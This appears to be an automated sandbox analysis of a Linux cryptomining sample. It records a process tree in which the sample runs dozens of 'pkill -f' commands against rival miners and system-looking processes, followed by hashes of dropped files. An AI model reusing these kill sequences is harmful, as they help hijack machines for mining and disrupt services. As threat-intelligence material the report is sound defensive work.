-
-
/usr/bin/pkillpkill -f Loopback2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f apaceha2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mixnerdx2⤵
-
-
/usr/bin/pkillpkill -f performedl2⤵
-
-
/usr/bin/pkillpkill -f JnKihGjn2⤵
-
-
/usr/bin/pkillpkill -f irqba2anc12⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f irqba5xnc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f irqbnc12⤵
-
-
/usr/bin/pkillpkill -f ir29xc12⤵
-
-
/usr/bin/pkillpkill -f conns2⤵
-
-
/usr/bin/pkillpkill -f irqbalance2⤵
-
-
/usr/bin/pkillpkill -f crypto-pool2⤵
-
-
/usr/bin/pkillpkill -f XJnRj2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mgwsl2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f pythno2⤵
-
-
/usr/bin/pkillpkill -f jweri2⤵
-
-
/usr/bin/pkillpkill -f lx262⤵
-
-
/usr/bin/pkillpkill -f NXLAi2⤵
-
-
/usr/bin/pkillpkill -f BI5zj2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f askdljlqw2⤵
-
-
/usr/bin/pkillpkill -f minerd2⤵
-
-
/usr/bin/pkillpkill -f minergate2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f Guard.sh2⤵
-
-
/usr/bin/pkillpkill -f ysaydh2⤵
-
-
/usr/bin/pkillpkill -f bonns2⤵
-
-
/usr/bin/pkillpkill -f donns2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f kxjd2⤵
-
-
/usr/bin/pkillpkill -f Duck.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f bonn.sh2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f conn.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f kworker342⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f kw.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f pro.sh2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f polkitd2⤵
-
-
/usr/bin/pkillpkill -f acpid2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f icb5o2⤵
-
-
/usr/bin/pkillpkill -f nopxi2⤵
-
-
/usr/bin/pkillpkill -f irqbalanc12⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f minerd2⤵
-
-
/usr/bin/pkillpkill -f i5862⤵
-
-
/usr/bin/pkillpkill -f gddr2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mstxmr2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f ddg.20112⤵
-
-
/usr/bin/pkillpkill -f wnTKYg2⤵
-
-
/usr/bin/pkillpkill -f deamon2⤵
-
-
/usr/bin/pkillpkill -f disk_genius2⤵
-
-
/usr/bin/pkillpkill -f sourplum2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f nanoWatch2⤵
-
-
/usr/bin/pkillpkill -f zigw2⤵
-
-
/usr/bin/pkillpkill -f devtool2⤵
-
-
/usr/bin/pkillpkill -f devtools2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f systemctI2⤵
-
-
/usr/bin/pkillpkill -f watchbog2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
-
-
/usr/bin/pkillpkill -f sustes2⤵
-
-
/usr/bin/pkillpkill -f xmrig2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f xmrig-cpu2⤵
-
-
/usr/bin/pkillpkill -f 121.42.151.1372⤵
-
-
/usr/bin/pkillpkill -f init12.cfg2⤵
-
-
/usr/bin/pkillpkill -f nginxk2⤵
-
-
/usr/bin/pkillpkill -f tmp/wc.conf2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
-
Filesize
2.4MB
MD53c4422a6f1d085fcc16e526c48adf547
SHA1c936b4732c59f107ad777fa4ab19dd21394f1d98
SHA256825c60dd1bb32cd6b7e6686f425c461532093b1e9f6ca662c1ea9b07ec7e470b
SHA5123733e82fc4c7d65a22bc49025e180000b3351aff4dbbc7f71ae81ee79c78976b26fdbe854b77edffe6ca8be87761689a16e81f3a48cd62d3405958ad64520c24
-
Filesize
14KB
MD5acdd938a49c8649f09ac5161e179f436
SHA1a0280dfedd8a81bf583b988e2b87f36705411347
SHA2568037fc1be0bf4f74bcfddadc1d3b0caf64076d56d36504c8bd68da94608d872a
SHA51228172ada3f95e5c0ea9c952ec7fca38ba11c871286fc91ff8cc2193233ef2a18cdd7e8dc56fb0f335030aed2ef9c3fb4a9f9b16eb5c6d8f2021fbbeeb4bad010
-
Filesize
150B
MD5eab0c11ba6d2b18c3e0e3714393804c2
SHA12dc66c4c5cc2f68f57675b8102eb037883bff203
SHA25663adfd622476b88e2a381218d853b913decb11c80f240d1ffb836d8020fb433e
SHA512e78d697a71f1e4382b57acab88e752910fc1780ded1bd1b02bd3fb7b7651497a4f4ae7f76655d784ad1d408853629fab7f2e690100ec532d510ebc6f22c12dd1
-
Filesize
2KB
MD5df3803b8b18481fbc63a8e2cecf22500
SHA1b44877d6f781a28f1ad3f0cc337c9c3cc7bffd96
SHA256b60a267608ea13830bfe41c7ee0f726a6562855112cf2310332dad43854e370a
SHA5128fab13258b597c5363c727a3208426a17dc1d66aaebee4977b2b5c8eb4044f09626167a75e69831a45095ca2b8cfaaa57eca6fea93a643f43266943765f7538d
-
Filesize
5.8MB
MD547d4dd12a8d89c10e8b8d32187c73f6a
SHA18c24d5bc0c7bdd0d7a6a23f5b75e80bd03b6ae11
SHA25611b45924f96844764c7ae56ce0b6ac3c43d3a732bc7101d7ce85ea52d0455afd
SHA5122f6ebcbe9a1eb577a2664f0a210abaa1914a2ef8883405b34ec2aaf23d2cff255c78d8a67835d87d16b520e5dde6287de25ee4459457d7166a1a041cbf471e92
-
Filesize
843B
MD58c5cc43ce7f2564040d2f3ec9146d8a5
SHA1f89fd0e26c70d13d08b7a3b3c5a966dc6f5b168d
SHA256d2acaa6c6b43913709c9fc7814b6f7a44ec31b69c21d18dc527e487e93311132
SHA51284f2930eb40d0bc5beeedb42e564b02e3796356d28ba8279d2915520d6d146d6939ed495e27661a9f95e50f84a12a6c37d6584c203e29ef515e1afd39c9108c6
-
Filesize
1KB
MD5644a2a75f6ce1498b20eedb05895525a
SHA1b51bf6e1d7760426c58c7e6a8b1cd96668b606ae
SHA256b178aae6c8f424d65175f8f0a9d1338be629d3d4a461a82814401aa73f984e17
SHA51223301b510e4d5b27a84eca032c453c710bf416f5ed5182830532f983e6c2c08ba34876d226513d55f003128abbad82db3e5c1ef715efae991df48903d8871cb6
-
Filesize
2KB
MD532ae3b50a16e9bb92b5fded30a16b31e
SHA1619a387d6706f34bf45532d063f178ad114a150b
SHA2568a693b4f5c9513399387f1d3d21970ead1952636ee9ca06169eb8d1e6be98672
SHA5126e0d9383d8b38338bce0064d28f6190fbffb8512888361d930087887eebd2825a448ddd1cce6ec9f544f945d9622bcd6e37531b7cda2dcafd54943a5b01a4de1
-
Filesize
3KB
MD5199765efd73e8f942f8f9271747953f5
SHA1cfbf4cdde89450e15aa1fa2a118406036384283d
SHA256cbf52bbf4ea09770fd09301d334b16fbbab3898f96c572ce6b7a22c28144b866
SHA5126f7e617d5af42e622808a2629bb6a3686ff24d04b762cca3dc94898c91bee2ab8e82fe41c0dacd089da1f82351337060b9138a24a0bb82a2301a07676e61796c
-
Filesize
4KB
MD53a990193e2ee1555e352d5f9b5798de0
SHA1d3141bc6dd962eb9b23ee8385a245ea11d6c5dbd
SHA256b284588ac7adb6c529ad90c6758a356ebb491d931990215de2f17cc37afa9576
SHA512bf5b95ab4ad6472d73c7a27835b6cf7381a18bb4da35678e3854015c61998c1a98cb9267cda2d39f8fd3709f01733320f46571cd4f1104ebeed3829699c0f960
-
Filesize
4KB
MD5be054b4a7e549e9da368248960605f96
SHA16f4f4617b75b9bc0ecf20a28a36dd14e5532fa89
SHA256cbecfd5a1ec632c881750cb215558085d694b83387c5799af8fc95a44790c760
SHA51277e7ca9f1847bfbad150aef3340a0bf42f59eba3ab112dc50e9f2b8e6f41ef2b7254442bf6c46f871f468e70e59aaac065f9ea8cfaa960b1be3b7f57b0832ab8
-
Filesize
128B
MD57bbab49b9721a4e50337b3f4707279c5
SHA13d7c8feffeee8018f903909206e7f151fc8ccc4f
SHA256c3b63f10f25e5ac42164d435bcd90cf57f25b1b5cb991c11c737698a2f080aaf
SHA512792212e4224c05ee1039eef535067e5999a403a1a9e49a0d9ff814737a1157f31a151f467c3db9db7696d7cf5236a1a2955bb58a0a5597d6dc69eaff8b9e31fa
-
Filesize
146B
MD5914a70be0ffa15b4d4c06707faa129b5
SHA1cc262aa5eb531024fb52e12e1c135405df0c0591
SHA256e2767f964edf4f1c26d21063dea9bcd7a001b47689f4947db6bfadbbd3e33fdc
SHA512563cb8eed710db81f11bcb3a79ece02bec1b00692e011303ce335d96375558614a1079189236ec4d07bd830047047e0faf16c0cf1396ca427633c6dbbb415d58
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
128B
MD50923f32458aa34813357a19ac354b51a
SHA113af026572da7b2328a7daba6e11c6dbb739afaa
SHA256fe8733a1601c37dff87198420d9a25de8cd1586869066e259c20e7201390d717
SHA51217f34cab557361190275f51801906eab55124197e758d505eceabd78b7caeab39660594c819a9ea870df5092e3c6f10ffbc2947f4ef089eb48b67c5db8fa5fcb
-
Filesize
146B
MD56dc30f5b142f6ec7507b832c0f83c2a7
SHA1efc6ce2e9258d11156bba683bc189b7455616926
SHA25665ce0321f43d663ddc17fb5aefae9260384370d6f0602edd7553a0b045ce3a2f
SHA512117999c6e2853fbb5ea7275f61f7ab7f192bebe7d3acf735d650f3a6d557c477e79a8006e31da2d402e87af30d730816afae4bdf3cb6e990445be55a33c7fecf
-
Filesize
128B
MD5ba422c3c165fe812972e73c41396496a
SHA12126416a0532d232e3a4dcd4eda4b133eeb3d96c
SHA256150a35fe28acb06a5a9d30d5e78d8fc92a9cfb9d1b2059dba211c81b7bc42c5a
SHA51293bbab4c6b95b50de7d82a5a28c0fc96a22f6cf5cc98d29766d1dd3095122d3e7d6518bf8d9c0869ed16fbffa7cf4d6fbf2079039e341e9ecd0894c229f2915d
-
Filesize
146B
MD525a85f4f76a4c3d191cab4a92d1fa0f4
SHA1880d05d8ebd25beb5f6ae82c5434b7980d336afd
SHA2566f2e116ed30b5008c61d85efe9d8daea42841faf87bb17dbfc9c9ba04b911641
SHA512edc8f90d16a6f4519fa3907da1eed10674b0beb999edcc0a2b478ca3a8b9de4d9cce7fe9fda56fdbe9d40c362e1dc26febff53fa1be212a6f0575a832cfb99a4
-
Filesize
915B
MD5ac76923784e2747c477784f3425df1ff
SHA1192b7735e2dc8f5d6d1e75f49b05cb5c151b14d9
SHA256c49779b1525039e8b665918cbe614d0cc15cc4c86b005f6a617f604c0b3bbb09
SHA512b04bb0cda8b25a5aafe873907a98fb26c48ea484fc776a292f61fbc2a5f6afaeeb9b317a2ab375bd51124ab83713434679ee342d1a88882160915c696a0fc264
-
Filesize
915B
MD58fa37fcfd9cdb92dee668a8b54f1bf8b
SHA15e7d5f7e78480c8527d359a4f453f97f2e3b848f
SHA2560fa2cc190383ef278d83e1d60da3604654bd4a74cd325e4f5e62458c53874e04
SHA512e58be4c8e7c489f9692eefef36134c14a7cc48cab36c3d408a396dec08dab3a4e89afbd0231a2671c260382109c1ac8067555e74dc7f9248d78a4d0a96f7920b
-
Filesize
915B
MD5a5897871f7f92959b9da45f39b53c2c2
SHA18a74aa4d2de6adbb70d7cc4500dc2c6d78daa713
SHA256a2a5fef97f0fc042f3f3995306afb8a78e5119231d5d3c90774e9a0e098f00ef
SHA51260eee05306c89ef005686d2ff6be24191a22be5e897a2a20a5488428750bd83a3b5c6012eee48208b19df6b3ddb0b2c4386aa28310c075b3c25371242eab5c57
-
Filesize
915B
MD5d858f1b63988b928f99fbb820bc9de71
SHA1a737a357caaaf40c909fc0e55a32afc0377c0931
SHA256dd876ec4d0ae19b200083c5709381dbd55d2dba1486004d7dc638c54ffdb8c6d
SHA512e747554ca390cf33ebe75c9db993cba98b1b69b5a85da511c0c12c02860a13b2a7aaebb600128d87c830ba4a79ab0412738bdd142fe952e09dfe43484aa2b894
-
Filesize
915B
MD5d7865d0f40f16baaf1f1c48f40284f38
SHA1c31cf52831526fb74b86b040e4062db7177cb3b2
SHA2563bc3c61ec4333c824d4c563ed1306d2490a033cb4af9b2d396a709ccf5673ec0
SHA5125a03d514f1b81f48cb4fd0b95b78aeb703a12969fbf9e9bc24cf696b1490eb66c06f00998e0bc6e7914a96b2a394e290a38037e2c022b3db8a093e0236c9eda8
-
Filesize
915B
MD5184b369a0d71ba0b99df70a72f477d8b
SHA110ebdc43a219ec6922de3580e50ddfaba8b31e8d
SHA256956bf02d8d8e07eeaab8bc71c9235289b59488e63f0035c8cd465f41a5c22f28
SHA512934094e7f3ffd479d7130b5f402daa60d624747f7c073995a508c7e657b522b4607206c3f571524ec31294132435e94e05182c4f1ddaa8b6adbc7b31b114e8c3
-
Filesize
288B
MD5c8b79651f9ac567f42d94eb8c5d30302
SHA1e545fee3d383d950c9e5f0d616f8eeb7de993ac1
SHA256dec020bb2efbfc35126a535a26d4c1a71417d13415875f2018a0be5776e93d4a
SHA512d90871aa9a2efaba9cebc5fc0b0a98393fd3eab41dafead1b04eaeb9d5bd67b35ef2c4661d97c071ee2e26b91551236427ab2a04f6fce307de14bc2ce8275170
-
Filesize
89B
MD5a19f74610d2a67534e8a0e21e47f3c0e
SHA16194df2966bb780bbea953e458a9fef249643e12
SHA256cc942222d097f2f8dd8bcfcb83dd9a2d33389b724fba6dad90e4187da2fd1131
SHA512dec6be5cb53cdecab3517894225cdd1764920d28ea15699d4c85032357b77894e7b49edcc4e9159cbb52eaad57d6355e952e8cd3d83081976a6d333765854baa
-
Filesize
288B
MD58d1e47c5fc9ac058cdd03c630e55b1e6
SHA14f04d5a488885e2f4317b59e1a125ea3a643c079
SHA256c23173a015bdd32ae63f271fa35743daaa4c7eeff945749a978d35f91cf20358
SHA512331e5ee38fb229ee947d103a5478e44dd788df5458fbf393c0d7f37c3f3b1f83cd11c375b82fc216cad21a5a3a7f0e946236356c23667b130c19c168c309d23f
-
Filesize
89B
MD552824efcf71922602784d519480cde61
SHA10763b283276bcd31dc6e0b73b1a9b49274d36f4c
SHA2562dbc79049c0c977128dbd1b4dc339b5db8b0131ff38ea3c21f8046c3978900da
SHA51203767621647ce79e6531ed1926d14700bfcc8de030cf323b86665c1a123e42e576c636bee674e00e43c44ef58905fc361507dae4d41bb065b8fd27fbd1417e6f
-
Filesize
89B
MD5dd3988a6b87fd6c720524527ecd79b52
SHA17c61d9057da925ef07bf171873bf26d9d9acf053
SHA25658669a91d846d6d460962d4e6ac42586224515583da18b1ed1baaaf3bc1c5d1c
SHA512f91909fc7f41f6d6afef83bbc2edf97c9bc2cc307b58dfb19b013033f259eda3bca5356aa1ea01f8a66596ffaaea16c0a0890432df1be93c12f1336a810d91b5
-
Filesize
288B
MD5ade834206266fb51c98b3d1d05dca053
SHA16e590cfa8a2e1464638094d2b41af069d6161f33
SHA2568d4bdaa0b68fc55d898c5beb48991271c3e7ec2c8de86e910675d90d8f76db23
SHA5126d52a5a2988aa609f1c03f1b8f2c725b818425e107f7f0d309dfbef9b10de4f962d94a5280f98abe44ec83af10bfd4a917c451191b096c6991e24f08cef232b6
-
Filesize
89B
MD5adc896cef830ff8d4cbd8c6302b64bdb
SHA19c4ae96657bca383c6f416c993e566f5708ed865
SHA256fb441a994433efd69d52e12420c17e1aedbe1c2ce563082a6921710d4b0d5dfd
SHA51214f2e66e6349238b74a624ea851818c20f57564c4a53e4e897a19c741620429872b3441375457a98bb5fa1bbf7be25bfdc2d18920f0ea76ba426623a45cb5401
-
Filesize
288B
MD524f22f26bfea0c929685547c65ae285d
SHA14e1644b9e819f369915c76f42f499e0fdac5bbe3
SHA256305122823e5407167846ce5d9ebfd48351c35a21654f8277417edeafb1285d38
SHA512c4876c636453e809f37d76132914bd92d597b9a3aee33ea390d067dee5a56cd0377baca061c518ed4b8efd69a88b54e68acb5157aab6e2f2c274f8b2ab1ea845
-
Filesize
89B
MD50aef4817662e542877293fbae04b0d0d
SHA1edb0a21aeb2461d32733e9adfde879122bab8784
SHA2563c019820224e47102d76094d414e3ddad75501762919e2d4a5735c0cf7e8b9d4
SHA5129f53638532d8e137cfb3ef896d6dea7ba2f95b473caaf7463b8dffedc3a5e384d96470baac8113f427c17069813a9b561c2a899da5678e69bdcc03d186a3abb5
-
Filesize
288B
MD5317191e79cb0cf5aaaf8e05f190a483d
SHA1200f01a7bbf4910e01c17831883a98d8f182992f
SHA256f559728540200720cacbd76090f9da6cbd8d4c9e8cf0e99365f37c999701bf2e
SHA5122d61cf6dcc94acbd23efff7bcf47159ee18c2b802199a5401231c6a378a7ff4d6a7b4edc98fadc0609ce0c7658b4fd08b35f4d799e5322043e18da773bc6eb98
-
Filesize
89B
MD55aec66b5308dedbefa9e987594098226
SHA19fe458ecbd79a1e19b94093b86cbc0a86891a05a
SHA256390dced4796d0cac4be8eec441b36d8cb839ab5e1f6c4aa95364ca07d288e567
SHA5126506b23626559017c23f8c6de620ef996087465544965f5cf4bd53f632529d1ef42983862123e9a01ff12435d619de76d9b9e61293c2e68299bc92be42eb289a
-
Filesize
288B
MD50dbecc5b45cd04c01583574217ca2ca6
SHA1701229df6e5c81ebdbc7a5fb1c540d8a1a24d193
SHA256205ef3e300ce80e75b36d3b7d3246657a400a32f9a7cbf16c91abacecfd07c37
SHA5129a1c2871bc0e96c3d0dd486a9a767885c652c19095a7396af7b18c29f64bcf5fd773352c25e47feb76a22834bd2a6b6877560612532457923166838785963ad5